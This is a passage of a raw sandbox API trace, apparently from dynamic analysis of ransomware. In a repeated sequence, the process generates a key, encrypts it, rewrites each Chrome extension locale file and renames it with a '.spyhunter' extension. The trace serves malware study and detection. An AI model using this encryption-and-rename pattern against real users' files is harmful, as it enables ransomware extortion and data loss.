Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.spyhunter") returned 165 [0137.900] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hi\\messages.json.spyhunter")) returned 1 [0137.900] GetProcessHeap () returned 0x2c0000 [0137.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0137.900] GetProcessHeap () returned 0x2c0000 [0137.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.900] GetProcessHeap () returned 0x2c0000 [0137.900] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1d9e0 | out: hHeap=0x2c0000) returned 1 [0137.901] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f1c0 | out: pbBuffer=0x270f1c0) returned 1 [0137.902] GetProcessHeap () returned 0x2c0000 [0137.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.902] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f1b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f1b8*=0x30) returned 1 [0137.902] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0137.902] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json") returned 155 [0137.902] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.902] GetProcessHeap () returned 0x2c0000 [0137.902] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.902] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f17c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f17c*=0x10c, lpOverlapped=0x0) returned 1 [0137.903] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xfffffef4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.903] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x270f17c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f17c*=0x10c, lpOverlapped=0x0) returned 1 [0137.903] GetProcessHeap () returned 0x2c0000 [0137.903] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.903] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.904] WriteFile (in: hFile=0x188, lpBuffer=0x270f1bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f17c, lpOverlapped=0x0 | out: lpBuffer=0x270f1bc*, lpNumberOfBytesWritten=0x270f17c*=0x4, lpOverlapped=0x0) returned 1 [0137.904] WriteFile (in: hFile=0x188, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f17c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f17c*=0x30, lpOverlapped=0x0) returned 1 [0137.904] CloseHandle (hObject=0x188) returned 1 [0137.904] GetProcessHeap () returned 0x2c0000 [0137.904] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0137.904] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.spyhunter") returned 165 [0137.904] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fr\\messages.json.spyhunter")) returned 1 [0137.905] GetProcessHeap () returned 0x2c0000 [0137.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0137.905] GetProcessHeap () returned 0x2c0000 [0137.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.905] GetProcessHeap () returned 0x2c0000 [0137.905] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1d6d0 | out: hHeap=0x2c0000) returned 1 [0137.906] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f1b8 | out: pbBuffer=0x270f1b8) returned 1 [0137.906] GetProcessHeap () returned 0x2c0000 [0137.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.907] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f1b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f1b0*=0x30) returned 1 [0137.907] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0137.908] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json") returned 156 [0137.908] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.908] GetProcessHeap () returned 0x2c0000 [0137.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.908] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f174, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f174*=0xea, lpOverlapped=0x0) returned 1 [0137.909] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff16, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.909] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x270f174, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f174*=0xea, lpOverlapped=0x0) returned 1 [0137.909] GetProcessHeap () returned 0x2c0000 [0137.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.910] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.910] WriteFile (in: hFile=0x188, lpBuffer=0x270f1b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f174, lpOverlapped=0x0 | out: lpBuffer=0x270f1b4*, lpNumberOfBytesWritten=0x270f174*=0x4, lpOverlapped=0x0) returned 1 [0137.910] WriteFile (in: hFile=0x188, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f174, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f174*=0x30, lpOverlapped=0x0) returned 1 [0137.910] CloseHandle (hObject=0x188) returned 1 [0137.910] GetProcessHeap () returned 0x2c0000 [0137.910] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0137.910] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.spyhunter") returned 166 [0137.910] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fil\\messages.json.spyhunter")) returned 1 [0137.911] GetProcessHeap () returned 0x2c0000 [0137.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0137.911] GetProcessHeap () returned 0x2c0000 [0137.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.911] GetProcessHeap () returned 0x2c0000 [0137.911] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1d3c0 | out: hHeap=0x2c0000) returned 1 [0137.912] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f1b0 | out: pbBuffer=0x270f1b0) returned 1 [0137.912] GetProcessHeap () returned 0x2c0000 [0137.912] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.912] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f1a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f1a8*=0x30) returned 1 [0137.912] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0137.914] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json") returned 155 [0137.914] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.914] GetProcessHeap () returned 0x2c0000 [0137.914] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.914] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f16c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f16c*=0x100, lpOverlapped=0x0) returned 1 [0137.915] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xffffff00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.915] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x270f16c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f16c*=0x100, lpOverlapped=0x0) returned 1 [0137.915] GetProcessHeap () returned 0x2c0000 [0137.915] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.915] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.915] WriteFile (in: hFile=0x188, lpBuffer=0x270f1ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f16c, lpOverlapped=0x0 | out: lpBuffer=0x270f1ac*, lpNumberOfBytesWritten=0x270f16c*=0x4, lpOverlapped=0x0) returned 1 [0137.915] WriteFile (in: hFile=0x188, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f16c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f16c*=0x30, lpOverlapped=0x0) returned 1 [0137.915] CloseHandle (hObject=0x188) returned 1 [0137.915] GetProcessHeap () returned 0x2c0000 [0137.915] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0137.915] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.spyhunter") returned 165 [0137.915] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\fi\\messages.json.spyhunter")) returned 1 [0137.916] GetProcessHeap () returned 0x2c0000 [0137.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0137.916] GetProcessHeap () returned 0x2c0000 [0137.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.916] GetProcessHeap () returned 0x2c0000 [0137.916] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1d0b0 | out: hHeap=0x2c0000) returned 1 [0137.924] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f1a8 | out: pbBuffer=0x270f1a8) returned 1 [0137.924] GetProcessHeap () returned 0x2c0000 [0137.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.924] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f1a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f1a0*=0x30) returned 1 [0137.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0137.925] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json") returned 155 [0137.925] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0137.925] GetProcessHeap () returned 0x2c0000 [0137.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0137.925] ReadFile (in: hFile=0x188, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f164, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f164*=0x10d, lpOverlapped=0x0) returned 1 [0137.926] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xfffffef3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0137.926] WriteFile (in: hFile=0x188, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x10d, lpNumberOfBytesWritten=0x270f164, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f164*=0x10d, lpOverlapped=0x0) returned 1 [0137.926] GetProcessHeap () returned 0x2c0000 [0137.926] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0137.926] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0137.926] WriteFile (in: hFile=0x188, lpBuffer=0x270f1a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f164, lpOverlapped=0x0 | out: lpBuffer=0x270f1a4*, lpNumberOfBytesWritten=0x270f164*=0x4, lpOverlapped=0x0) returned 1 [0137.926] WriteFile (in: hFile=0x188, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f164, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f164*=0x30, lpOverlapped=0x0) returned 1 [0137.926] CloseHandle (hObject=0x188) returned 1 [0137.927] GetProcessHeap () returned 0x2c0000 [0137.927] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0137.927] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.spyhunter") returned 165 [0137.927] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\es\\messages.json.spyhunter")) returned 1 [0137.928] GetProcessHeap () returned 0x2c0000 [0137.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0137.928] GetProcessHeap () returned 0x2c0000 [0137.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0137.928] GetProcessHeap () returned 0x2c0000 [0137.928] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1cda0 | out: hHeap=0x2c0000) returned 1 [0137.929] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f1a0 | out: pbBuffer=0x270f1a0) returned 1 [0137.929] GetProcessHeap () returned 0x2c0000 [0137.929] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0137.929] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f198*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f198*=0x30) returned 1 [0137.929] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0138.025] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json") returned 155 [0138.025] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0138.026] GetProcessHeap () returned 0x2c0000 [0138.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0138.026] ReadFile (in: hFile=0x184, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f15c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f15c*=0xd7, lpOverlapped=0x0) returned 1 [0138.026] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xffffff29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.027] WriteFile (in: hFile=0x184, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0xd7, lpNumberOfBytesWritten=0x270f15c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f15c*=0xd7, lpOverlapped=0x0) returned 1 [0138.093] GetProcessHeap () returned 0x2c0000 [0138.093] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0138.093] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.094] WriteFile (in: hFile=0x184, lpBuffer=0x270f19c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f15c, lpOverlapped=0x0 | out: lpBuffer=0x270f19c*, lpNumberOfBytesWritten=0x270f15c*=0x4, lpOverlapped=0x0) returned 1 [0138.094] WriteFile (in: hFile=0x184, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f15c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f15c*=0x30, lpOverlapped=0x0) returned 1 [0138.094] CloseHandle (hObject=0x184) returned 1 [0138.094] GetProcessHeap () returned 0x2c0000 [0138.094] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0138.094] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.spyhunter") returned 165 [0138.094] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\en\\messages.json.spyhunter")) returned 1 [0138.095] GetProcessHeap () returned 0x2c0000 [0138.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0138.095] GetProcessHeap () returned 0x2c0000 [0138.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0138.095] GetProcessHeap () returned 0x2c0000 [0138.095] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f1ca90 | out: hHeap=0x2c0000) returned 1 [0138.096] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f198 | out: pbBuffer=0x270f198) returned 1 